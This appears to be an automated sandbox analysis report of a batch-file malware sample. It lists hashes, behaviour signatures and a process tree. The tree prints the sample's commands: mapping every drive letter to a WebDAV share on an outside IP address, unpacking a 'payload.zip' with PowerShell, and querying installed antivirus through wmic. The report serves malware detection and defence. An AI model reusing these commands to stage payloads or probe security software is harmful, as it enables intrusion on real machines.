Analysis
max time kernel: 147s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/10/2023, 00:51
Static task: static1
Behavioral task: behavioral1
  Sample: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
  Resource: win10v2004-20230915-en
General
Target: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat
Size: 1KB
MD5: 3e04fa57bc1837dd6eb1ddfaaa0c8fb3
SHA1: 52c4646dd2796cb4da7a50f6777e3a18f9d48179
SHA256: 5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4
SHA512: d6679d25b561ff1162a9efffea72deff19e5b1b5a4fe74c5fca590fa1df276f0e24ae6f838a7fc5751533c15553c99c94fec2d3d86d4f6823c1579a9438f0bc6
Signatures
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid   Process
1336  powershell.exe
1336  powershell.exe
Suspicious use of AdjustPrivilegeToken 43 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
- C:\Windows\system32\cmd.exe (PID 2204)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 4872)
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\5d5bdbb6eb2ec87262819ae52795e945fd43efe00f47ec28be2f070ef091f8f4_JC.bat min
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (PID 4736)
      Command line: net use Z: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 5080)
      Command line: net use Y: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 3048)
      Command line: net use X: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 1532)
      Command line: net use W: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 2068)
      Command line: net use V: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 4440)
      Command line: net use U: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 1440)
      Command line: net use T: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 5076)
      Command line: net use S: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 3328)
      Command line: net use R: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 2312)
      Command line: net use Q: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 2476)
      Command line: net use P: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 4324)
      Command line: net use O: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 1420)
      Command line: net use N: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 668)
      Command line: net use M: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 3780)
      Command line: net use L: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 4580)
      Command line: net use K: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 1996)
      Command line: net use J: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 4128)
      Command line: net use I: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 3952)
      Command line: net use H: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 4908)
      Command line: net use G: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 5012)
      Command line: net use F: \\172.96.161.208@8080\DavWWWRoot /user:username password
    - C:\Windows\system32\net.exe (PID 2356)
      Command line: net use E: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 2056)
      Command line: net use D: \\172.96.161.208@8080\DavWWWRoot /user:username password
    - C:\Windows\system32\net.exe (PID 3796)
      Command line: net use C: \\172.96.161.208@8080\DavWWWRoot /user:username password
    - C:\Windows\system32\net.exe (PID 4536)
      Command line: net use B: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\system32\net.exe (PID 3872)
      Command line: net use A: \\172.96.161.208@8080\DavWWWRoot /user:username password
      Signatures: Enumerates connected drives
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1336)
      Command line: powershell -command "Expand-Archive -Path 'C:\Users\Admin\Pictures\payload.zip' -DestinationPath 'C:\Users\Admin\Pictures\' -Force"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\net.exe (PID 3712)
      Command line: net use /delete
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (PID 972)
        Command line: C:\Windows\system32\net1 use /delete
    - C:\Windows\system32\cmd.exe (PID 4112)
      Command line: C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\Wbem\WMIC.exe (PID 3536)
        Command line: wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
        Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82